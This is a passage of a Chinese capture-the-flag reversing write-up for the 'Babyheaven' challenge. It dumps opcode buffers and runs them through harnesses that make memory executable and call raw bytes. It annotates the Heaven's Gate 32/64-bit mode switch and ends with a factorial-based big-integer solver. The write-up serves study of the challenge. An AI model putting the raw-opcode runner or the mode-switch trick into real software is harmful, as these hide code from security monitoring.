48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x98\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x54\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x60\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xad\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x3b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xf\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x6e\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xff\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xff\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xff\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xeb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x23\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x4
5\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x98\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x54\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x60\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x98\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x80\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x39\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x75\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x17\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x3b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xcf\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xeb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xc
c\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x3b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xde\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xfd\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xff\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xff\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xeb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5f\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc3\x83\x45\xcc\x1\x8b\x45\xc8\x89\x45\xcc\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x6a\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x23\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xcb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6
\x0\x0\x83\x45\xcc\x1\x8d\x85\x88\xfe\xff\xff\x89\x44\x24\xc\xc7\x44\x24\x8\x40\x0\x0\x0\x8b\x45\xd0\x89\x44\x24\x4\x8b\x45\xcc\x89\x4\x24\x8b\x45\xe0\xff\xd0\x83\xec\x10\xc7\x85\x68\xfe\xff\xff\x42\x79\x74\x65\xc7\x85\x6c\xfe\xff\xff\x43\x54\x46\x7b\xc7\x85\x70\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x74\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x78\xfe\xff\xff\x7d\x0\x0\x0\xc7\x85\x7c\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x80\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x84\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x60\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x64\xfe\xff\xff\x0\x0\x0\x0\x8d\x85\x60\xfe\xff\xff\x8d\x95\x68\xfe\xff\xff\x8d\x8d\x68\xfe\xff\xff\x83\xc1\x8\x8b\x5d\xd4\x6a\x0\xff\xb5\xbc\xfe\xff\xff\x6a\x0\x50\x52\x6a\x0\xff\xb5\xbc\xfe\xff\xff\x51\xff\xb5\xb4\xfe\xff\xff\x53\xff\xb5\x8c\xfe\xff\xff\xff\xb5\xb8\xfe\xff\xff\xc3";
/* Signature used to call into the raw opcode buffer: no arguments, no result. */
typedef void (*FUNC_POINT)(void);
int main()
{
    /*
     * Analysis harness: gives the extracted opcode bytes in `function` a call
     * site so that a disassembler/decompiler treats the buffer as a function
     * (the write-up's "compile, then F5").
     * The MessageBoxA/printf calls do not touch the buffer; presumably they are
     * only landmarks that make main easy to find - confirm.
     */
    FUNC_POINT entry = (FUNC_POINT)function;

    MessageBoxA(0, 0, 0, 0);
    printf("hello world");
    entry();
    return 0;
}
编译之后能直接进函数F5,可以看到大致流程
题目名称为 Babyheaven,由此了解到了天堂之门(Heaven's Gate),该题程序流程和地球人的看雪博客里面差不多。
主要分析的东西就在opcode里面,opcode有三个部分,分别是32切64,主要函数,64切32,先提opcode,然后和刚才一样编译一下,提取的时候中间指针直接+0x100
然后有一个回跳的步骤
#include <stdio.h>
#include <Windows.h>
unsigned char function[] = "\x55\x57\x48\x81\xec\xd8\x1\x0\x0\x48\x8d\xac\x24\x80\x0\x0\x0\x48\x89\x8d\x70\x1\x0\x0\x48\x8d\x55\x60\xb8\x0\x0\x0\x0\xb9\x1b\x0\x0\x0\x48\x89\xd7\xf3\x48\xab\x48\x89\xfa\x89\x2\x48\x83\xc2\x4\xc7\x45\x60\x5\x0\x0\x0\xc7\x45\x64\x12\x0\x0\x0\xc7\x45\x68\xe\x0\x0\x0\xc7\x45\x6c\x17\x0\x0\x0\xc7\x45\x70\x9\x0\x0\x0\xc7\x45\x74\xf\x0\x0\x0\xc7\x45\x78\x4\x0\x0\x0\xc7\x45\x7c\x15\x0\x0\x0\xc7\x85\x80\x0\x0\x0\xa\x0\x0\x0\xc7\x85\x84\x0\x0\x0\x14\x0\x0\x0\xc7\x85\x88\x0\x0\x0\x13\x0\x0\x0\xc7\x85\x8c\x0\x0\x0\x19\x0\x0\x0\xc7\x85\x90\x0\x0\x0\x18\x0\x0\x0\xc7\x85\x94\x0\x0\x0\x16\x0\x0\x0\xc7\x85\x98\x0\x0\x0\xc\x0\x0\x0\xc7\x85\x9c\x0\x0\x0\x10\x0\x0\x0\xc7\x85\xa0\x0\x0\x0\x2\x0\x0\x0\xc7\x85\xa4\x0\x0\x0\x11\x0\x0\x0\xc7\x85\xa8\x0\x0\x0\x7\x0\x0\x0\xc7\x85\xac\x0\x0\x0\x1\x0\x0\x0\xc7\x85\xb0\x0\x0\x0\x8\x0\x0\x0\xc7\x85\xb4\x0\x0\x0\xb\x0\x0\x0\xc7\x85\xb8\x0\x0\x0\x6\x0\x0\x0\xc7\x85\xbc\x0\x0\x0\xd\x0\x0\x0\xc7\x85\xc0\x0\x0\x0\x3\x0\x0\x0\x48\x8d\x55\x80\xb8\x0\x0\x0\x0\xb9\x1b\x0\x0\x0\x48\x89\xd7\xf3\x48\xab\x48\x89\xfa\x89\x2\x48\x83\xc2\x4\xc7\x45\x80\x5\x0\x0\x0\xc7\x45\x84\x12\x0\x0\x0\xc7\x45\x88\xe\x0\x0\x0\xc7\x45\x8c\x17\x0\x0\x0\xc7\x45\x90\xb\x0\x0\x0\xc7\x45\x94\x11\x0\x0\x0\xc7\x45\x98\xc\x0\x0\x0\xc7\x45\x9c\x4\x0\x0\x0\xc7\x45\xa0\x19\x0\x0\x0\xc7\x45\xa4\x18\x0\x0\x0\xc7\x45\xa8\x1\x0\x0\x0\xc7\x45\xac\x14\x0\x0\x0\xc7\x45\xb0\x13\x0\x0\x0\xc7\x45\xb4\xf\x0\x0\x0\xc7\x45\xb8\xd\x0\x0\x0\xc7\x45\xbc\xa\x0\x0\x0\xc7\x45\xc0\x6\x0\x0\x0\xc7\x45\xc4\x15\x0\x0\x0\xc7\x45\xc8\x7\x0\x0\x0\xc7\x45\xcc\x16\x0\x0\x0\xc7\x45\xd0\x8\x0\x0\x0\xc7\x45\xd4\x3\x0\x0\x0\xc7\x45\xd8\x9\x0\x0\x0\xc7\x45\xdc\x2\x0\x0\x0\xc7\x45\xe0\x10\x0\x0\x0\xc7\x85\x44\x1\x0\x0\x19\x0\x0\x0\x48\x8b\x85\x70\x1\x0\x0\x48\xc7\x0\x0\x0\x0\x0\x48\x8b\x85\x70\x1\x0\x0\x48\x8b\x0\x48\x8d\x50\x1\x48\x8b\x85\x70\x1\x0\x0\x48\x89\x10\x8b\x85\x44\x1\x0\x0\x83\xe8\x1\x89\x85\x4c\x1\x0\x0\xeb\x26\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\
x83\xe8\x1\x48\x98\x8b\x44\x85\x60\x39\xc2\x7f\x12\x83\xad\x4c\x1\x0\x0\x1\x83\xbd\x4c\x1\x0\x0\x0\x7f\xd1\xeb\x1\x90\x83\xbd\x4c\x1\x0\x0\x0\xf\x8e\xba\x1\x0\x0\x8b\x85\x44\x1\x0\x0\x83\xe8\x1\x89\x85\x48\x1\x0\x0\xeb\x26\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x48\x98\x8b\x44\x85\x60\x39\xc2\x7f\x17\x83\xad\x48\x1\x0\x0\x1\x8b\x85\x48\x1\x0\x0\x3b\x85\x4c\x1\x0\x0\x7d\xcc\xeb\x1\x90\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x48\x98\x8b\x4c\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x31\xd1\x48\x63\xd0\x89\x4c\x95\x60\x48\x98\x8b\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x48\x1\x0\x0\x48\x98\x89\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x4c\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x31\xca\x48\x98\x89\x54\x85\x60\x8b\x85\x44\x1\x0\x0\x83\xe8\x1\x89\x85\x48\x1\x0\x0\xe9\x80\x0\x0\x0\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x4c\x1\x0\x0\x48\x98\x89\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x48\x1\x0\x0\x48\x98\x89\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x4c\x1\x0\x0\x48\x98\x89\x54\x85\x60\x83\x85\x4c\x1\x0\x0\x1\x83\xad\x48\x1\x0\x0\x1\x8b\x85\x4c\x1\x0\x0\x3b\x85\x48\x1\x0\x0\xf\x8c\x6e\xff\xff\xff\xc7\x85\x4c\x1\x0\x0\x0\x0\x0\x0\xeb\x23\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x44\x85\x80\x39\xc2\x75\x17\x83\x85\x4c\x1\x0\x0\x1\x8b\x85\x4c\x1\x0\x0\x3b\x85\x44\x1\x0\x0\x7c\xcf\xeb\x1\x90\x8b\x85\x4c\x1\x0\x0\x3b\x85\x44\x1\x0\x0\x7d\x8\xe9\xde\xfd\xff\xff\x90\xeb\x1\x90\x48\x81\xc4\xd8\x1\x0\x0\x5f\x5d\xc3";
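/* Signature used to call into the raw opcode buffer: no arguments, no result. */
typedef void (*FUNC_POINT)(void);
/*
 * Analysis harness for the extracted 64-bit routine stored in `function`.
 *
 * Marks the buffer executable and calls it, so the bytes show up as a real
 * function in a disassembler/decompiler.
 *
 * NOTE(review): the routine starts by saving rcx (48 89 8D 70 01 00 00) and
 * later stores through that pointer (48 8B 85 70 01 00 00 / 48 C7 00 ...), so
 * it expects one pointer argument - the step counter described in the
 * write-up - which this zero-argument call does not supply. Presumably the
 * harness is built for decompilation rather than run to completion; confirm
 * before executing it.
 *
 * Returns 0 on success, 1 if the protection change fails.
 */
int main()
{
    DWORD old;

    /*
     * Change protection only for the pages that hold the buffer
     * (sizeof(function)) rather than a fixed 0x1000 bytes, which can also make
     * the page after the array writable and executable.
     * Check the result: if the call fails the buffer stays non-executable and
     * the indirect call below would fault.
     */
    if (!VirtualProtect(&function, sizeof(function), PAGE_EXECUTE_READWRITE, &old))
    {
        fprintf(stderr, "VirtualProtect failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    /* Neither call touches the buffer; presumably landmarks for locating main. */
    MessageBoxA(0, 0, 0, 0);
    printf("hello world");

    ((FUNC_POINT)function)();
    return 0;
}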
// 32-bit -> 64-bit switch (the "Heaven's Gate" entry sequence)
; 33h is the value the far return below loads into CS. On WoW64 that selector
; is the 64-bit code segment, so execution continues in 64-bit mode inside the
; same 32-bit process.
; Review note: a far transfer to selector 33h from 32-bit code is what static
; signatures for this technique key on; the 64-bit part is not shown by a
; 32-bit-only disassembly, which is why the write-up extracts and recompiles it.
push 33h ; '3'
; Pushes the address of the following instruction as the return offset.
call $+5
; Advances that saved offset by 5 so the far return lands just past the retf
; (presumably 4 bytes for this add plus 1 for retf - confirm against the bytes).
add [esp+10h+var_10], 5
; Far return: pops the adjusted offset, then pops 33h into CS.
retf
// 64-bit -> 32-bit switch (the way back)
; 23h is the selector reloaded into CS here, i.e. the 32-bit code segment.
push 23h ; '#'
; Same trick as above: push the address of the next instruction.
call $+5
; 7 = size of this add plus the retfq that follows (the opcode string earlier
; in the listing emits 48 83 04 24 07 48 CB for the two instructions).
add qword ptr [esp], 7
; 64-bit far return: pops the adjusted offset, then pops 23h into CS.
retfq
函数里面实现了一个排序功能(倒序),但是复杂度是 O(n!),执行次数对 __int64 取模就是大括号中间的值。
通过尝试发现如果是一个n阶的正序序列,经过此算法得到倒序序列,刚好需要 n! 步,而此题需要的是从一个序列状态到另一个序列状态的步骤数。
设求解的是从状态A到状态B,那么N(A-B) = N(A-0) - N(B-0)
0表示的是完全倒序状态。由此问题变为了求解某个状态到0状态的步骤数。
上述问题又可以拆分为以下子问题:假设当前一个n阶序列,第一个元素随机,后n-1个元素已经倒序,求当前状态到n个元素倒序的状态需要的步数。要是对原本的程序不做修改,只是输出当前序列的状态的话,可以发现此时的第一个元素是逐渐变大,由此可以连蒙带猜得出子问题的结论 N(步数) = (n-1)! * N(后n-1个元素中,大于第一个元素的个数)
然后就倒腾一下脚本就出来了。
因为子问题的步骤数会爆 __int64,所以随便找了份高精度。
#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<iostream>
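#define MAXN 1000
using namespace std;
// Arbitrary-precision non-negative decimal integer ("high precision").
// s[0..len-1] holds one decimal digit per int, least-significant digit first.
// Capacity is fixed at MAXN digits: operator+ and operator* do not check for
// results that need more, so callers must stay within that bound.
struct HP
{
    int len,s[MAXN];
    // Zero value: a single digit 0.
    HP()
    {
        memset(s,0,sizeof(s));
        len=1;
    }
    // Assign from a decimal string (most-significant digit first).
    // Characters are not validated: anything outside '0'..'9' is stored as an
    // out-of-range digit. Returns a copy of the updated object.
    HP operator =(const char *num)
    {
        size_t total=strlen(num);
        // Never write past s: keep only the MAXN low-order digits of longer input.
        size_t digits=total<(size_t)MAXN?total:(size_t)MAXN;
        // Clear everything first; the converting constructors reach this point
        // without having zeroed s.
        memset(s,0,sizeof(s));
        for(size_t i=0;i<digits;i++) s[i]=num[total-1-i]-'0';
        len=digits?(int)digits:1; // "" is stored as 0
        clean();                   // drop leading zeros so "007" equals "7"
        return *this;              // was missing: falling off the end is undefined behaviour
    }
    // Assign from an int. Only num >= 0 is meaningful: the '-' of a negative
    // value would be stored as a digit.
    HP operator =(int num)
    {
        char buf[32]; // ample for the decimal form of an int, sign and NUL included
        snprintf(buf,sizeof(buf),"%d",num);
        *this=buf;
        return *this;
    }
    HP(int num) { *this=num;}
    HP(const char*num) {*this=num;}
    // Decimal representation, most-significant digit first.
    string str()const
    {
        string res(len,'0');
        for(int i=0;i<len;i++) res[len-1-i]=(char)(s[i]+'0');
        if(res=="") res="0";
        return res;
    }
    // Schoolbook addition; g is the carry.
    HP operator +(const HP& b) const
    {
        HP c;
        c.len=0;
        for(int i=0,g=0;g||i<max(len,b.len);i++)
        {
            int x=g;
            if(i<len) x+=s[i];
            if(i<b.len) x+=b.s[i];
            c.s[c.len++]=x%10;
            g=x/10;
        }
        return c;
    }
    // Strip leading zeros, always keeping at least one digit.
    void clean()
    {
        while(len > 1 && !s[len-1]) len--;
    }
    // Schoolbook multiplication. The caller must keep len+b.len <= MAXN.
    HP operator *(const HP& b) const
    {
        HP c;
        c.len=len+b.len;
        for(int i=0;i<len;i++)
            for(int j=0;j<b.len;j++)
                c.s[i+j]+=s[i]*b.s[j];
        // Single carry pass after all partial products have been accumulated.
        for(int i=0;i<c.len-1;i++)
        {
            c.s[i+1]+=c.s[i]/10;
            c.s[i]%=10;
        }
        c.clean();
        return c;
    }
    // Subtraction; g is the borrow. Assumes *this >= b (there is no sign).
    HP operator - (const HP& b) const
    {
        HP c;
        c.len = 0;
        for(int i=0,g=0;i<len;i++)
        {
            int x=s[i]-g;
            if(i<b.len) x-=b.s[i];
            if(x>=0)
                g=0;
            else
            {
                g=1;
                x+=10;
            }
            c.s[c.len++]=x;
        }
        c.clean();
        return c;
    }
    // Long division by repeated subtraction; f is the running remainder.
    // b must be non-zero, otherwise the inner loop never terminates.
    HP operator / (const HP &b) const
    {
        HP c, f = 0;
        for(int i = len-1; i >= 0; i--)
        {
            f = f*10;
            f.s[0] = s[i];
            while(f>=b)
            {
                f =f-b;
                c.s[i]++;
            }
        }
        c.len = len;
        c.clean();
        return c;
    }
    // Remainder, computed as *this - (*this / b) * b.
    HP operator % (const HP &b) const
    {
        HP r = *this / b;
        r = *this - r*b;
        return r;
    }
    HP operator /= (const HP &b)
    {
        *this = *this / b;
        return *this;
    }
    HP operator %= (const HP &b)
    {
        *this = *this % b;
        return *this;
    }
    // Ordering: more digits means larger, otherwise compare from the top digit
    // down. Relies on both operands having no leading zeros.
    bool operator < (const HP& b) const
    {
        if(len != b.len) return len < b.len;
        for(int i = len-1; i >= 0; i--)
            if(s[i] != b.s[i]) return s[i] < b.s[i];
        return false;
    }
    bool operator > (const HP& b) const
    {
        return b < *this;
    }
    bool operator <= (const HP& b) const
    {
        return !(b < *this);
    }
    bool operator == (const HP& b) const
    {
        return !(b < *this) && !(*this < b);
    }
    bool operator != (const HP &b) const
    {
        return !(*this == b);
    }
    HP operator += (const HP& b)
    {
        *this = *this + b;
        return *this;
    }
    bool operator >= (const HP &b) const
    {
        return *this > b || *this == b;
    }
};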
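// Stream extraction for HP: reads one whitespace-delimited token and stores it
// as the decimal digits of x.
// The token is external input, so it is checked before it reaches the fixed
// MAXN-digit array: a failed read, a token longer than MAXN characters or any
// character outside '0'..'9' leaves x untouched and sets failbit on the stream.
istream& operator >>(istream &in, HP& x)
{
    string token;
    if(!(in >> token)) return in; // nothing read: keep x as it was

    bool ok = token.size() <= (size_t)MAXN;
    for(size_t k = 0; ok && k < token.size(); k++)
        if(token[k] < '0' || token[k] > '9') ok = false;

    if(!ok)
    {
        in.setstate(ios::failbit);
        return in;
    }
    x = token.c_str();
    return in;
}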
// Stream insertion for HP: writes the decimal form produced by HP::str().
ostream& operator <<(ostream &out, const HP& x)
{
    const string digits = x.str();
    return out << digits;
}
// Working copy of the 25-element sequence; main fills it and reorders it in place.
int v4[25] = {0};
// Number of elements in v4.
int v5 = 25;
// Scan positions shared with main (names kept from the decompiler output).
int i;
int j;
// Running total of counted steps.
HP tot = 0;
// Factorial of n as an HP value: the product of 1..n, computed with an HP
// counter so that it never overflows a machine integer.
HP jc(int n)
{
    const HP limit = n;
    const HP one = 1;
    HP product = 1;
    HP k = 1;
    while(k <= limit)
    {
        product = product * k;
        k += one;
    }
    return product;
}
// Comparator for std::sort that yields descending order.
bool cmp(int a,int b)
{
    return b < a;
}
// Counts how many steps the challenge routine needs to take the first sequence
// to fully descending order, without replaying the steps one by one.
// Each pass applies the write-up's shortcut: when the tail after position i-1
// is already descending, fixing position i-1 costs
// (tail length)! * (number of tail elements greater than v4[i-1]).
int main()
{
    // First of the two 25-element sequences built by the extracted routine.
    static const int start[25] = {
        5, 18, 14, 23, 9, 15, 4, 21, 10, 20, 19, 25, 24,
        22, 12, 16, 2, 17, 7, 1, 8, 11, 6, 13, 3
    };
    for (int idx = 0; idx < 25; ++idx)
        v4[idx] = start[idx];

    for (;;)
    {
        // Walk back from the end to the last position that is larger than its
        // predecessor; everything from that position on is non-increasing.
        i = v5 - 1;
        while (i > 0 && v4[i] <= v4[i - 1])
            --i;

        // No such position: the whole array is descending, nothing left to count.
        if (i <= 0)
            break;

        if (i != v5 - 1)
        {
            // Last tail element that is still greater than v4[i-1]; the tail is
            // descending, so j-i+1 elements are greater.
            j = v5 - 1;
            while (j >= i && v4[j] <= v4[i - 1])
                --j;

            const int now_n = v5 - i;
            const HP K = j - i + 1;
            tot += jc(now_n) * K;
            sort(v4 + i - 1, v4 + v5, cmp);
            printf("%d %d \n", i, j);
        }
        else
        {
            // Only the final pair is out of order: exactly one step.
            tot += 1LL;
            sort(v4 + i - 1, v4 + v5, cmp);
        }
    }

    cout << tot << endl;
